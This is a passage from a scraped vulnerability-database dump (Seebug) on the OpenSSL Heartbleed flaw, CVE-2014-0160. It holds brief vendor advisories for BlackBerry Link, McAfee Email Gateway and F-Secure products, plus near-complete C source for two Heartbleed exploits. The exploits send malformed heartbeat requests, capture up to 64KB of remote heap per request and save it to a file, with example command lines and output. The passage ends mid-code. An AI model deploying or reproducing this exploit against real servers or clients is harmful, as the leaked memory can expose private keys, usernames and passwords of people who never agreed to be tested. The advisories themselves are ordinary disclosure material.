0){\r\n\t\t\t\t\tiprecmd = 1;\r\n\t\t\t\t\tprecmd = atoi(optarg);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'v':\r\n\t\t\t\tverbose = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\tloop = 1;\r\n\t\t\t\tbreak;\r\n \t case 'u':\r\n\t\t\t\tudp = 1;\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tdefault:\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif(ihost==0||iport==0||ifile==0||itype==0){\r\n\t\tprintf("[ try --help\\n");\r\n\t\texit(0);\r\n\t}\r\n\tssl_init();\r\n\tif(bind==0){\r\n\t\tif (udp){\r\n\t\t\tc = dtls_client(ret, host, port);\r\n\t\t\tdtlsheartbleed(c, 
type);\r\n\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t\twhile(loop==1){\r\n\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\tfirst=0;\r\n\t\t\t\trepeat=1;\r\n\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse {\r\n\t\t\tret = tcp_connect(host, port);\r\n\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\tc = tls_connect(ret);\r\n\t\t\theartbleed(c,type);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t\twhile(loop==1){\r\n\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\tfirst=0;\r\n\t\t\t\trepeat=1;\r\n\t\t\t\theartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tSSL_shutdown(c->sslHandle);\r\n\t\tclose (ret);\r\n\t\tSSL_free(c->sslHandle);\r\n\t}\r\n\telse{\r\n\t\tint sd, pid, i;\r\n\t\tif (udp) {\r\n\t\t\tc = dtls_server(sd, host, port);\r\n\t\t\twhile (1) {\r\n\t\t\t\tchar * bytes = malloc(1024);\r\n\t\t\t\tstruct sockaddr_in peer;\r\n\t\t\t\tsocklen_t len = sizeof(peer);\r\n\t\t\t\t\tif (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\r\n\t\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\twhile(loop==1){\r\n\t\t\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\t\t\tfirst=0;\r\n\t\t\t\t\t\t\trepeat=0;\r\n\t\t\t\t\t\t\tdtlsheartbleed(c,type);\r\n\t\t\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\telse {\r\n\t\t\tret = tcp_bind(host, port);\r\n\t\t\twhile(1){\r\n\t \t\t\tsd=accept(ret,0,0);\r\n\t\t\t\tif(sd==-1){\r\n\t\t\t\t\tprintf("[!] 
FATAL: problem with accept()\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tif(pid=fork()){\r\n\t\t\t\t\tclose(sd);\r\n\t\t\t\t}\r\n\t \t\t\telse{\r\n\t\t\t\t\tc = tls_bind(sd);\r\n\t\t\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t}\r\n\t\t\t\t\twhile(loop==1){\r\n\t\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\t\tfirst=0;\r\n\t\t\t\t\t\trepeat=0;\r\n\t\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\tprintf("[ done.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86255", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:21", "description": "CVE ID:CVE-2014-0160\r\n\r\nBlackBerry Link is synchronization software for BlackBerry devices.\r\n\r\nThe OpenSSL bundled with BlackBerry Link contains a security vulnerability: a boundary error in OpenSSL's handling of the TLS \u201cheartbeat\u201d extension allows an attacker to exploit the flaw to obtain 64k of memory contents from a connected client or server. The memory may include private keys, usernames, passwords, and so on.\n0\nBlackBerry Link 1.x\nNo detailed solution is currently available:\r\nhttp://www.blackberry.com", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "BlackBerry Link OpenSSL TLS Heartbeat Information Disclosure Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62182", "id": "SSV:62182", 
"sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:30", "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Email Gateway is a comprehensive email security solution.\r\n\r\nThe OpenSSL bundled with McAfee Email Gateway contains a security vulnerability: a boundary error in OpenSSL's handling of the TLS \u201cheartbeat\u201d extension allows an attacker to exploit the flaw to obtain 64k of memory contents from a connected client or server. The memory may include private keys, usernames, passwords, and so on.\n0\nMcAfee Email Gateway 7.x\nThe vendor has released an upgrade patch that fixes the vulnerability; download and apply it:\r\nhttps://kc.mcafee.com/corporate/index?page=content&id=SB10071", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "McAfee Email Gateway OpenSSL TLS Heartbeat Information Disclosure Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62192", "id": "SSV:62192", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:26", "description": "CVE ID:CVE-2014-0160\r\n\r\nThe F-Secure E-mail/Server Security/F-Secure Server Security products contain a security vulnerability.\r\n\r\n
The OpenSSL bundled with F-Secure E-mail/Server Security/F-Secure Server Security contains a security vulnerability: a boundary error in OpenSSL's handling of the TLS \u201cheartbeat\u201d extension allows an attacker to exploit the flaw to obtain 64k of memory contents from a connected client or server. The memory may include private keys, usernames, passwords, and so on.\n0\nF-Secure E-mail and Server Security 10.x\r\nF-Secure E-mail and Server Security 11.x\r\nF-Secure Server Security 10.x\r\nF-Secure Server Security 11.x\nThe vendor has released an upgrade patch that fixes the vulnerability; download and apply it:\r\nhttp://www.f-secure.com/en/web/labs_global/fsc-2014-1", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "F-Secure E-mail/Server Security OpenSSL TLS/DTLS Heartbeat Information Disclosure Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62185", "id": "SSV:62185", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T14:03:33", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Heartbleed OpenSSL - Information Leak Exploit (1)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86061", "id": "SSV:86061", "sourceData": "\n /* \r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. 
The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted \r\n* and written to a file to annoy IDS/forensics. The exploit can \r\n* set heartbeat payload length arbitrarily or use two preset \r\n* values for NULL and MAX length. The vulnerability occurs due \r\n* to bounds checking not being performed on a heap value which \r\n* is user supplied and returned to the user as part of DTLS/TLS \r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \r\n* 1.0.1f are known affected. You must run this against a target \r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks up to 65535 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size. 
\r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" \r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include 
<getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n\r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n\t\t(((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n\r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n\r\ntypedef struct {\r\n\tint socket;\r\n\tSSL *sslHandle;\r\n\tSSL_CTX *sslContext;\r\n} connection;\r\n\r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n\r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n\r\nint tcp_connect(char* server,int port){\r\n\tint sd,ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n\tprintf("[ connecting to %s %d/tcp\\n",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n\tif(ret==0){\r\n\t\tprintf("[ connected to %s %d/tcp\\n",server,port);\r\n\t}\r\n\telse{\r\n\t\tprintf("[!] 
FATAL: could not connect to %s %d/tcp\\n",server,port);\r\n\t\texit(0);\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nint tcp_bind(char* server, int port){\r\n\tint sd, ret, val=1;\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *host;\r\n\thost = gethostbyname(server);\r\n\tsd=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sd==-1){\r\n \t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tmemset(&sin,0,sizeof(sin));\r\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=htons(port);\r\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n\tif(ret==-1){\r\n\t\tprintf("[!] cannot bind socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tlisten(sd,5);\r\n\treturn(sd);\r\n}\r\n\r\n\r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n\r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n\tc = malloc(sizeof(connection));\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* tls_bind(int sd){\r\n\tint bytes;\r\n connection *c;\r\n char* 
buf;\r\n\tbuf = malloc(4096);\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nint pre_cmd(int sd,int precmd,int verbose){\r\n\t/* this function can be used to send commands to a plain-text\r\n\tservice or client before heartbleed exploit attempt. e.g. 
STARTTLS */\r\n\tint rc, go = 0;\r\n\tchar* buffer;\r\n\tchar* line1;\r\n\tchar* line2; \r\n\tswitch(precmd){\r\n\t\tcase 0:\r\n\t\t\tline1 = "EHLO test\\n";\r\n\t\t\tline2 = "STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tline1 = "CAPA\\n";\r\n\t\t\tline2 = "STLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tline1 = "a001 CAPB\\n";\r\n\t\t\tline2 = "a002 STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tgo = 1;\r\n\t\t\tbreak;\r\n\t}\r\n\tif(go==0){\r\n\t\tbuffer = malloc(2049);\r\n\t if(buffer==NULL){\r\n \tprintf("[ error in malloc()\\n");\r\n \texit(0);\r\n\t }\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tprintf("[ banner: %s",buffer);\r\n\t\tsend(sd,line1,strlen(line1),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t\tsend(sd,line2,strlen(line2),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nvoid* heartbleed(connection *c,unsigned int type){\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\ts2n(0xffff,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n\treturn c;\r\n}\r\n\r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, 
orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n 
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' 
':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nvoid usage(){\r\n\tprintf("[\\n");\r\n\tprintf("[ --server|-s <ip/dns> - the server to target\\n");\r\n\tprintf("[ --port|-p <port> - the port to target\\n");\r\n\tprintf("[ --file|-f <filename> - file to write data to\\n");\r\n\tprintf("[ --bind|-b <ip> - bind to ip for exploiting clients\\n");\r\n\tprintf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n");\r\n\tprintf("[\t\t\t 0 = SMTP\\n");\r\n\tprintf("[\t\t\t 1 = POP3\\n");\r\n\tprintf("[\t\t\t 2 = IMAP\\n");\r\n\tprintf("[ --loop|-l\t\t - loop the exploit attempts\\n");\r\n\tprintf("[ --type|-t <n> - select exploit to try\\n");\r\n\tprintf("[ 0 = null length\\n");\r\n\tprintf("[\t\t\t 1 = max leak\\n");\r\n\tprintf("[\t\t\t n = heartbeat payload_length\\n");\r\n\tprintf("[\\n");\r\n\tprintf("[ --verbose|-v - output leak to screen\\n");\r\n\tprintf("[ --help|-h - this 
